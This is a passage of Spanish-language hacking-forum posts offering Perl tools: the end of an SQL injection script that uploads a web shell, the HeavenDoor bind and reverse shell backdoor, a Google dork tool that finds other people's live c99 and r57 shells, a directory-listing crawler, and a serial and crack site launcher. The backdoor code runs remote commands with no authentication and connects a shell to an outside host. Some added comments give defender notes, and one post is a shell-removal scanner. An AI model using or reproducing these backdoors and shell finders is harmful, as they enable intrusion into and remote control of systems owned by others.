    print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
    savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
    } else {
    print "[shell] : Not Found\n";
    }
    }
    }
    }

    # encode($string): return "0x" followed by the lowercase hex code of every
    # character in $string ("%x", so no zero padding). The result is also left in
    # the package global $hex.
    sub encode {
    my $string = $_[0];
    my @digits = map { sprintf("%x", ord($_)) } split(//, $string);
    $hex = join('', '0x', @digits);
    return $hex;
    }

    # decode($hex): turn a "0x..." hex string back into text, two hex digits per
    # character. The leading "0x" is stripped from the caller's variable in place
    # ($_[0] is an alias), and the result is also stored in the global $encode.
    sub decode {
    $_[0] =~ s/^0x//;
    my @pairs = $_[0] =~ /../g;
    $encode = '';
    for my $pair (@pairs) {
        $encode .= chr(hex($pair));
    }
    return $encode;
    }

    # bypass($style): map the operator's separator choice to a two-element list
    # (token separator, statement terminator) used when building request URLs.
    #   "/*"  -> ("/**/", "/**/")
    #   "%20" -> ("%20",  "%00")
    #   other -> ("+",    "--")
    # Defender note: filters that match on literal spaces miss all three forms;
    # normalise comments and URL encoding before pattern matching.
    sub bypass {
    my $style = $_[0];
    return ("/**/","/**/") if $style eq "/*";
    return ("%20","%00") if $style eq "%20";
    return ("+","--");
    }

    # ascii($text): return the code points of $text as a comma-separated list,
    # e.g. "ab" -> "97,98" (the argument format of SQL char()).
    sub ascii {
    my @codes = unpack("U*", $_[0]);
    return join(',', @codes);
    }

    # ascii_de($list): inverse of ascii(): turn "97,98" back into "ab".
    # The caller's variable is overwritten with the decoded text ($_[0] is an
    # alias), and the same text is returned.
    sub ascii_de {
    my $texto = '';
    for my $code (split(q[,], $_[0])) {
        $texto .= chr($code);
    }
    $_[0] = $texto;
    return $_[0];
    }


    sub finish {
    &copyright;
    <STDIN>;
    exit(1);
    }

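    # installer(): make sure the relative directories "logs/" and "logs/webs/"
    # exist (savefile() appends to files under logs/webs/).
    #
    # Two defects fixed:
    #   - the existence test looked at the absolute path "/logs/webs" while the
    #     directories are created relative to the working directory, so the
    #     test never reflected what was actually created;
    #   - the mode was the decimal number 777 (octal 01411), not an octal
    #     permission. 0755 is used so the log tree is not world-writable.
    # A failed mkdir is reported instead of being ignored.
    # Returns 1 when both directories exist afterwards, 0 otherwise.
    sub installer {
    for my $dir ("logs/", "logs/webs/") {
        next if -d $dir;
        unless (mkdir($dir, 0755)) {
            warn "installer: cannot create $dir: $!\n";
            return 0;
        }
    }
    return 1;
    }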

    sub copyright {
    print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
    }

    # toma($url): GET $url with the shared LWP::UserAgent ($nave) and return the
    # response body. The HTTP status is not checked, so error pages are returned
    # like any other content.
    sub toma {
    my $response = $nave->get($_[0]);
    return $response->content;
    }

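    # savefile($name, $text): append $text plus a newline to logs/webs/$name.
    #
    # $name is built by callers from the authority part of the target URL, and
    # $text often contains data returned by the remote server, so both are
    # untrusted. The original used two-argument open on a bareword handle and
    # ignored failures; this version uses three-argument open with a lexical
    # handle and reports a failed open or close.
    # Logging stays best-effort: a failure warns and returns false, it does not die.
    # NOTE(review): logged text is written verbatim; view these logs as plain
    # text, since server-supplied content may contain terminal escape sequences
    # or markup.
    sub savefile {
    my ($name, $text) = @_;
    my $path = "logs/webs/" . $name;
    my $fh;
    unless (open($fh, '>>', $path)) {
        warn "savefile: cannot open '$path': $!\n";
        return;
    }
    print {$fh} $text . "\n";
    unless (close($fh)) {
        warn "savefile: error closing '$path': $!\n";
        return;
    }
    return 1;
    }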

    # finish(): print the copyright line, wait for Enter, then exit.
    # This is the second "sub finish" in the listing. Perl keeps the later
    # definition of a redefined sub, so this is the one that runs.
    # The exit status is 1 even on a normal finish.
    sub finish {
    print "\n\n\n(C) Doddy Hackman 2010\n\n";
    <STDIN>;
    exit(1);
    }


    # The End ?
#338
Scripting / [Perl] HeavenDoor 0.5
1 Diciembre 2011, 22:13 PM
La nueva versión de este backdoor que hice hace tiempo


#!usr/bin/perl
#HeavenDoor 0.5
#By Doddy H

use IO::Socket;
use Cwd;

# Mode selection from the command line:
#   -reverse host:port  -> conectar() dials host:port, then tipo() starts a shell
#   -backdoor port      -> listar() listens on that port
# Any other first argument prints the usage line.
# Defender note: neither mode authenticates the peer, so whoever holds the other
# end of the socket runs commands as the account that launched this script.
if ($ARGV[0] eq "-reverse") {
if ($ARGV[1] =~/(.*):(.*)/) {
my $ip = $1;
my $port = $2;
conectar($ip,$port);
tipo();
}
}
elsif ($ARGV[0] eq "-backdoor") {
listar($ARGV[1]);
} else {
print "\n[+] Examples : $0 -backdoor 666 / -reverse localhost:666\n";
}

# Bind-shell loop: listen on TCP port $_[0], greet each client, and run every
# line the client sends as a local command, returning the output.
# No LocalAddr is given, so the listener is not restricted to one interface,
# and there is no authentication step anywhere between accept() and qx().
# Defender note: on a host this appears as a perl process holding a listening
# TCP socket and starting a child command for each line it receives; the
# greeting text below is a stable string to match in network captures.
sub listar {
$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $_[0],
Listen    => SOMAXC,
Reuse     => 1);

print "[*] Heaven_Door Online\n[*] Port : $_[0]\n[*] PID : ".$$."\n\n";

# Clients are served one at a time: the inner read loop runs until the client
# disconnects before accept() is called again.
while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
# The banner sent to the client always says port 25256, whatever was bound.
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
# The received line is executed as is; its output goes back to the client.
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

# Sends host details to the connected client through the global $jesus handle.
sub extras {

if ($^O =~//ig) {
use Win32;
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
}

# Dial out to host $_[0], port $_[1], and re-open STDIN, STDOUT and STDERR as
# duplicates of that socket, so every later read and print in this process goes
# to the remote peer instead of the local terminal.
# None of the socket/connect/open return values is checked.
# Defender note: a perl process whose standard descriptors 0-2 all refer to one
# outbound TCP socket is the observable trace of this routine on a host.
sub conectar {
print "[+] Listening\n";
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

# Start an interactive command interpreter: cmd.exe when $^O matches "Win32",
# otherwise `sh -i` with TERM set to xterm. The child inherits this process's
# standard handles; in the dispatch code above conectar() runs first, so those
# handles are the network socket by the time the shell starts.
# Defender note: process telemetry shows perl as the parent of cmd.exe or sh.
sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
use Win32;
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End ?


Esta nueva versión surgió de la mezcla de estos dos códigos que había hecho

heaven_door.pl

Código (perl) [Seleccionar]

#!usr/bin/perl
#Heaven_Door is a backdoor in Perl
#Coded By Doddy Hackman

use IO::Socket::INET;
use Net::hostent;
use Cwd;
use Win32;

# Listener on the fixed TCP port 25256. No LocalAddr is given, so it is not
# restricted to one interface.
$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => '25256',
Listen    => SOMAXC,
Reuse     => 1);



print "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";


# Accept loop: greet the client, then execute each received line with qx() and
# send the output back. Nothing authenticates the client.
# Defender note: port 25256 and the "Heaven_Door Online" greeting are fixed
# strings in this version and can be matched in listener inventories and
# network captures.
while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}



reverse_shell.pl

Código (perl) [Seleccionar]

#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

# Connect to host $_[0], port $_[1], and re-open STDIN, STDOUT and STDERR as
# duplicates of that socket; everything the process reads or prints afterwards
# goes over the connection. Return values are not checked.
# Defender note: the trace on a host is a perl process whose descriptors 0-2
# all point at a single outbound TCP connection.
sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End
#339
Scripting / [Perl] GenWordlist 0.2
1 Diciembre 2011, 22:12 PM
Simple programa en perl para generar diccionarios

Código (perl) [Seleccionar]

#!usr/bin/perl
#Gen Wordlist 0.2
#By Doddy H
#ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd

use LWP::UserAgent;
use HTML::Strip;

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

head();
unless($ARGV[0]) {
sintax();
} else {
start($ARGV[0]);
}
copyright();

# Download the page in $_[0], strip its markup with HTML::Strip, split the text
# on whitespace and print every distinct word. The intermediate lists are kept
# in the globals @palabras and @palabrasx.
sub start {

    print "\n[+] Getting source code of the page\n";

    my $stripper = HTML::Strip->new(emit_spaces => 1);
    foreach my $chunk (toma($_[0])) {
        push @palabras, $stripper->parse($chunk);
    }

    # split q[ ] is the awk-style split: runs of whitespace, no empty leading field.
    push @palabrasx, map { split q[ ] } @palabras;

    my @final = repes(@palabrasx);

    print "\n[+] Words Found : ".scalar(@final)."\n\n";

    print "[+] Word : $_\n" foreach @final;

}

sub sintax {
print "\n[+] sintax : $0 <web>\n";
}

sub head {
print "\n\n-- == Gen Wordlist == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

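# Return the arguments with duplicates removed, first occurrence kept, order
# preserved.
# The bookkeeping is lexical: with the former globals (@limpio, %repe) a second
# call returned the words of the first call as well and dropped anything the
# first call had already seen.
sub repes {
    my %seen;
    my @unique;
    for my $word (@_) {
        push @unique, $word unless $seen{$word}++;
    }
    return @unique;
}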

sub toma {
return $nave->get( $_[0] )->content;
}

# The End ?
#340
Scripting / [Perl] FinderText 0.1
1 Diciembre 2011, 22:11 PM
Un simple programa para buscar cierto texto en un archivo o directorio.

Código (perl) [Seleccionar]
#!usr/bin/perl
#FinderText 0.1
#Written by Doddy H

print "\n-- == FinderText 0.1 == --\n\n";
unless($ARGV[0]) {
print "\n[+] sintax : $0 <file/dir> <text>\n";
} else {
print "\n[+] Searching text\n\n";
if (-f $ARGV[0]) {
verificar($ARGV[0],$ARGV[1]);
}
if (-d $ARGV[0]) {
goodbye($ARGV[0],$ARGV[1]);
}
print "\n[+] Finished\n";
}
print "\n\n[+] Written By Doddy H\n\n";

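# Print every line of $file that contains $text (case-insensitive), with its
# 1-based line number.
#   $file - path of the file to read
#   $text - literal text to look for; nothing is reported when it is missing
sub verificar {

    my ($file, $text) = @_;
    return unless defined $text and length $text;

    # Three-argument open: the path is data only. With the two-argument form a
    # file name met while walking a directory could be read as a mode or pipe.
    open(my $fh, '<', $file)
        or do { warn "[-] Cannot open $file: $!\n"; return; };

    my $numero_linea = 0;
    while (my $linea = <$fh>) {
        chomp $linea;
        $numero_linea++;
        # \Q..\E: the search text is matched literally, so input such as "("
        # or "a.b" neither breaks the pattern nor matches more than was typed.
        if ($linea =~ /\Q$text\E/i) {
            print "[+] Text $text Found in file $file in line $numero_linea\n";
        }
    }
    close $fh;
    return;
}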

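# Walk directory $_[0] recursively and run verificar() on every regular file,
# looking for the text in $_[1].
# Changes against the original: the search text is now passed down when
# recursing (it used to be dropped, so sub-directories were searched for
# nothing), the handle is closed with closedir, and symbolic links to
# directories are not followed, which avoids endless recursion on a link loop.
sub goodbye {

    my ($dir, $text) = @_;

    opendir(my $dh, $dir)
        or do { warn "[-] Cannot read directory $dir: $!\n"; return; };
    my @archivos = readdir $dh;
    closedir $dh;

    for my $entry (@archivos) {
        next if $entry eq "." or $entry eq "..";
        my $fichero = $dir."/".$entry;

        if (-f $fichero) {
            verificar($fichero, $text);
        }
        elsif (-d $fichero and not -l $fichero) {
            goodbye($fichero, $text);
        }
    }
    return;
}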

# The End ?

#341
Scripting / [Perl] FinderShells 0.3
1 Diciembre 2011, 22:11 PM
Simple programa para buscar phpshells activas usando google

Código (perl) [Seleccionar]
#!/usr/bin/perl
#Finder Shells 0.3 (c) Doddy Hackman 2011

use LWP::UserAgent;
use HTTP::Request::Common;

installer();

my $nave = LWP::UserAgent->new();
$nave->timeout(3);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;

print "\n[Pages] : ";
chomp(my $pa = <stdin>);

$option = men();

if ($option eq 1) {
@pages = google("www.google.com.ar","intitle:\"- c99shell\"",$pa);
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/--\[ c99shell/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 2) {
@pages = google("www.google.com.ar","intitle:\"r57shell\"",$pa);
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/o---\[ r57shell - http-shell by RST/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 3) {
@pages = google("www.google.com.ar","intitle:\"--= DxShell 1.0 - by o_O Tync =--\"",$pa);
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/--= DxShell 1.0 - by o_O Tync =--/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 4) {
@pages = google("www.google.com.ar","o--\[ heroes1412 \]--",$pa);
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/o--\[ heroes1412 \]--/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 5) {
@pages = google("www.google.com.ar","Locus7Shell",$pa);
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/--\[ x2300 Locus7Shell/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
else {
print "\n\n[-] Bad Option\n\n";
}
print "\n\n[+] Finish\n\n";
copyright();
<stdin>;


sub men {
print "\n\n[+] Shells to find : \n\n";
print "[1] : c99\n";
print "[2] : r57\n";
print "[3] : Dxshell\n";
print "[4] : heroes1412\n";
print "[5] : Locus7Shell\n\n";
print "\n[Options] : ";
chomp(my $option = <STDIN>);
return $option;
}


sub head {
print "\n\n -- == Finder Shells == --\n\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2010\n\n";
}

# Issue a GET for the URL in $_[0] through the shared user agent $nave and
# return the response body; the status code is not looked at.
sub toma {
    my $request  = GET $_[0];
    my $response = $nave->request($request);
    return $response->content;
}

sub google {
print "\n[Dork] : $_[1]\n[Paginas] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Erasing repeated\n";
for(@founds) {
$t = $_;
push(@r,$t);
}
return(repes(@r));
}


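# Return the arguments without duplicates, keeping the first occurrence of each
# and the original order.
# The seen-table and result list are lexical so that one call cannot affect the
# next; the former globals (%repety, @revisado) accumulated across calls.
sub repes {
    my %seen;
    my @unique;
    foreach my $palabra (@_) {
        next if $seen{$palabra}++;
        push @unique, $palabra;
    }
    return @unique;
}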


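# Cut a string after its first "=": "page.php?id=5" becomes "page.php?id=".
# Returns nothing when the string contains no "=".
sub clean {
    my $text = $_[0];
    return unless $text =~ /\=/;
    my @sacar = split("=", $text);
    # $sacar[0], not the one-element slice @sacar[0] the original used.
    return $sacar[0]."=";
}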

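# Append one line to logs/<name>.
#   $_[0]   - file name below logs/
#   $_[1]   - text to append (a newline is added)
#   returns - true on success, nothing when the file cannot be opened
sub savefile {
    my ($name, $line) = @_;
    my $path = "logs/".$name;

    # Three-argument open with a lexical handle; a failed open is reported
    # instead of being followed by a print to a closed handle.
    open(my $out, '>>', $path)
        or do { warn "savefile: cannot open $path: $!\n"; return; };
    print {$out} $line."\n";
    close($out) or warn "savefile: cannot close $path: $!\n";
    return 1;
}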

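# Create the logs/ directory under the current working directory (where
# savefile() appends) when it is missing.
# The original tested the absolute path "/logs" while creating the relative
# one, and passed the mode as decimal 777; mkdir expects an octal mode.
sub installer {
    return if -d "logs";
    mkdir("logs", 0755) or warn "installer: cannot create logs: $!\n";
    return;
}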

# ¿ The End ?

#342
Scripting / [Perl] FinderPaths 0.5
1 Diciembre 2011, 22:10 PM
Simple programa para buscar el típico listado de directorios. Se puede usar de dos formas: la primera es una búsqueda simple y la otra es al estilo spider; esta última nos ayuda a seguir buscando directorios escalando los encontrados.

Código (perl) [Seleccionar]
#!usr/bin/perl
#Finder Paths 0.5 Coded By Doddy H

use LWP::UserAgent;
use URI::Split qw(uri_split);
use HTML::LinkExtor;
use Getopt::Long;

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

GetOptions(
"-target=s" => \$target,
"-option=s" => \$opcion);

head();
unless ($target && $opcion) {
sintax();
}
else  {
if ($opcion eq "spider") {
print "\n[+] Searching in $target\n";
escalar($target);
}
elsif($opcion eq "simple") {
print "\n[+] Searching in $target\n\n\n";
simple($target);
} else {
print "\n[-] Error\n";
}
}
copyright();

sub escalar {

my $code  = toma( $_[0] );
my @links = get_links($code);

if ( $code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "\n\n[+] Directory Found : $dir_found\n\n";
while ( $code =~ /<a href=\"(.*)\">(.*)<\/a>/ig ) {
my $ruta   = $1;
my $nombre = $2;
unless ( $nombre =~ /Parent Directory/ig or $nombre =~ /Description/ig ) {
unless ($nombre=~/\/$/) {
print "[+] File Found : $nombre\n";
}
push(@encontrados,$_[0]."/".$nombre);
}
}
}

#get more

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
escalar("http://".$auth.$parche );                   
}
}
for(@encontrados) {
escalar($_);
}}}}

sub simple {

my $code  = toma($_[0]);
my @links = get_links($code);

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
my $code=toma("http://".$auth.$parche);     

if ( $code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "[+] Directory Found : $dir_found\n";
}}}}}}

# Fetch the URL in $_[0] with the shared user agent $nave and hand back the
# response body, whatever the status code was.
sub toma {
    my $response = $nave->get( $_[0] );
    return $response->content;
}

# Parse the HTML text in $_[0] with HTML::LinkExtor and return the collected
# link attribute values.
# NOTE(review): @links is not declared in this sub and is never emptied here,
# so each call appears to return the links gathered by all earlier calls as
# well; the callers' `my @links` are separate variables. Confirm whether the
# accumulation is intended.
sub get_links {

$test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
return @links;

# Callback invoked by HTML::LinkExtor for each tag: the first argument is
# ignored, the values of the remaining attribute pairs are appended to @links.
sub agarrar {
my ( $a, %b ) = @_;
push( @links, values %b );
}
}

sub head {
print "\n\n-- == FinderPaths 0.5 == --\n\n";
}

sub sintax {
print "\n[+] Sintax : $0 -target <web> -option <simple/spider>\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

# The End ?
#343
Scripting / [Perl] DestroyerShells 0.3
1 Diciembre 2011, 22:09 PM
Un programa para buscar phpshells en nuestra computadora y poder borrarlas si nos molestan

Código (perl) [Seleccionar]

#!usr/bin/perl
#DestroyerShells 0.3
#Writtten By Doddy H

use File::Find;

# Marker strings looked for inside each scanned file; finder() matches each one
# case-insensitively against the file contents.
my @nombres = ("C99Shell","r57shell","DxShell","HiddenShell","~ Andr3a92 ~ Sh3ll ~","CShell","Dark Shell","GsC SheLL","N3fa5t1cA Sh3ll","ONBOOMSHELL",
"StAkeR ~ Shell","MoDDeD By KinG-InFeT","31337 Shel");
# Paths of the files in which a marker was found (filled by finder()).
my @founds;

print "\n-- == DestroyerShells 0.3 == --\n";
# The only argument is the directory to scan; without it the usage line is shown.
unless($ARGV[0]) {
print "\n[+] sintax : $0 <dir>\n";
} else {
start($ARGV[0]);
}
print "\n\n[+] Written By Doddy H\n\n";

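# Scan $dir recursively for files that contain one of the marker strings in
# @nombres, list them, and delete them after an explicit "y"/"yes".
#
# Caveats for whoever runs this as a clean-up step:
#   * a hit only means the file contains a marker string; notes or logs that
#     merely mention a shell by name match too, so read the list before
#     confirming the deletion;
#   * only names ending in .txt or .php are opened, so a shell stored under
#     another extension is not reported, and an empty result is not proof that
#     the tree is clean.
sub start {
    my $dir = shift;
    print "\n\n[+] Searching in directory $dir\n\n";

    find(\&finder, $dir);

    my @founda = repes(@founds);
    my $total  = scalar @founda;

    print "[+] Number of files found : ".$total."\n\n";
    return if $total == 0;

    for my $path (@founda) {
        print "[+] File Found : $path\n";
    }

    print "\n[+] Delete files y/n : ";
    my $op = <STDIN>;
    $op = '' unless defined $op;    # end of input counts as no answer
    chomp $op;

    # Whole-answer match: the original accepted any input that merely
    # contained a "y" as consent to delete.
    if ($op =~ /\A\s*y(?:es)?\s*\z/i) {
        my $deleted = 0;
        for my $path (@founda) {
            if (unlink $path) {
                $deleted++;
            }
            else {
                warn "[-] Could not delete $path: $!\n";
            }
        }
        print "\n[+] Files Deleted\n" if $deleted == $total;
    }
    elsif ($op =~ /\A\s*no?\s*\z/i) {
        print "\n[+] Good Bye\n";
    }
    else {
        print "\n[+] Write good stupid\n";
    }
    return;
}

# File::Find callback: record the full path of every .txt/.php regular file
# whose contents include one of the marker strings.
sub finder {
    my $file = $_;
    return unless -f $file;
    return unless $file =~ /\.txt$/ or $file =~ /\.php$/;

    my $abrir = $File::Find::name;

    # File::Find has changed into the file's directory, so the file is opened
    # by its bare name; the full path in $abrir is relative to the starting
    # directory and would not resolve from here when $dir was relative.
    open(my $fh, '<', $file)
        or do { warn "[-] Cannot read $abrir: $!\n"; return; };
    my $words = do { local $/; <$fh> };
    close $fh;
    return unless defined $words;

    for my $rastro (@nombres) {
        # \Q..\E keeps a marker literal even if one with regex metacharacters
        # is added to the list later.
        if ($words =~ /\Q$rastro\E/i) {
            push(@founds, $abrir);
            last;
        }
    }
    return;
}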

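# Return the arguments with duplicates removed, first occurrence kept, order
# preserved. State is lexical, so a second call starts from scratch instead of
# inheriting the previous call's results through the globals @limpio and %repe.
sub repes {
    my %seen;
    my @unique;
    for my $item (@_) {
        push @unique, $item unless $seen{$item}++;
    }
    return @unique;
}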

# The End ?
#344
Scripting / [Perl Tk] SerialFinder 0.2
1 Diciembre 2011, 22:09 PM
Simple programa en tk para buscar seriales de programas o juegos

Código (perl) [Seleccionar]
#!usr/bin/perl
#SerialFinder 0.2
#By Doddy H

use Tk;
use Tk::PNG;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

my $ventana = MainWindow->new();
$ventana->title("SerialFinder 0.2 By Doddy H");
$ventana->geometry("370x300+20+20");
$ventana->resizable(0,0);

$ventana->Label(-font=>"Impact1",-text=>"String : ")->place(-x=>20,-y=>20);
my $p = $ventana->Entry(-text=>"Nero",-width=>"31")->place(-x=>80,-y=>23);
$ventana->Button(-width=>"10",-text=>"Load",-command=>\&now)->place(-x=>278,-y=>23);

$ventana->Label(-text=>"Options",-font=>"Impact1")->place(-x=>140,-y=>70);

$ventana->Radiobutton(-text =>"serials.be", -value => "serials.be",-variable=> \$op)->place(-x=>130,-y=>130);
$ventana->Radiobutton(-text =>"serials.ws", -value => "serials.ws",-variable=> \$op)->place(-x=>130,-y=>160);
$ventana->Radiobutton(-text =>"cracks.vg", -value => "cracks.vg",-variable=> \$op)->place(-x=>130,-y=>190);
$ventana->Radiobutton(-text =>"serialportal.com", -value => "serialportal.com",-variable=> \$op)->place(-x=>130,-y=>220);
$ventana->Radiobutton(-text =>"freeserials.ws", -value => "freeserials.ws",-variable=> \$op)->place(-x=>130,-y=>250);

MainLoop;

# Button callback: build a search URL for the site selected in $op from the
# text in the entry box and open it with Firefox through the `start` command.
sub now {

my $link;
my $test = $p->get;

chomp $test;

if ($op eq "serials.be") {
$link = "http://www.serials.be/search_serial.php?serial=".$test;
}
elsif ($op eq "serials.ws") {
$link = "http://www.serials.ws/?chto=".$test;
}
elsif ($op eq "cracks.vg") {
$link = "http://www.cracks.vg/search.php?query=".$test;
}
elsif ($op eq "serialportal.com") {
$link = "http://www.serialportal.com/search.php?serial=".$test;
}
elsif ($op eq "freeserials.ws") {
$link = "http://www.freeserials.ws/?q=".$test."&Search=Search";
} else {
$link = "http://www.google.com.ar/search?q=como aprender a escribir";
}

# NOTE(review): $link holds the raw entry-box text and is interpolated unquoted
# into a single command string. Spaces split the URL into several arguments,
# and characters such as & | > in the text (or the "&" of the freeserials URL)
# are interpreted by the command processor. The text should be percent-encoded
# and the URL quoted before it reaches system().
system("start firefox $link");

}

# The End ?
#345
Scripting / [Perl Tk] GoogleHack 0.3
1 Diciembre 2011, 22:08 PM
Simple programa en tk para buscar en google


Código (perl) [Seleccionar]
#!usr/bin/perl
#GoogleHack 0.3
#By Doddy H
#Based in the program GoogleHacks
use Tk;
use Tk::PNG;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

my $ventana = MainWindow->new();
$ventana->title("GoogleHack 0.3 By Doddy H");
$ventana->geometry("370x300+20+20");
$ventana->resizable(0,0);

$ventana->Label(-font=>"Impact1",-text=>"String : ")->place(-x=>20,-y=>20);
my $v = $ventana->Entry(-text=>"Test",-width=>"31")->place(-x=>80,-y=>23);
$ventana->Button(-width=>"10",-text=>"Load",-command=>\&now)->place(-x=>278,-y=>23);

$ventana->Label(-text=>"Options",-font=>"Impact1")->place(-x=>140,-y=>70);

$ventana->Radiobutton(-text =>"Music", -value => "music",-variable=> \$op)->place(-x=>140,-y=>130);
$ventana->Radiobutton(-text =>"Programs", -value => "programs",-variable=> \$op)->place(-x=>140,-y=>160);
$ventana->Radiobutton(-text =>"Book", -value => "book",-variable=> \$op)->place(-x=>140,-y=>190);
$ventana->Radiobutton(-text =>"Videos", -value => "videos",-variable=> \$op)->place(-x=>140,-y=>220);
$ventana->Radiobutton(-text =>"Torrent", -value => "torrent",-variable=> \$op)->place(-x=>140,-y=>250);

MainLoop;

sub now {

my $test = $v->get;
my $link;

if ($op eq "music") {
$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.mp3|.wma|.ogg) "'.$test.'"';
}
elsif ($op eq "programs") {
$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.exe|.zip|.ddl) "'.$test.'"';
}
elsif ($op eq "book") {
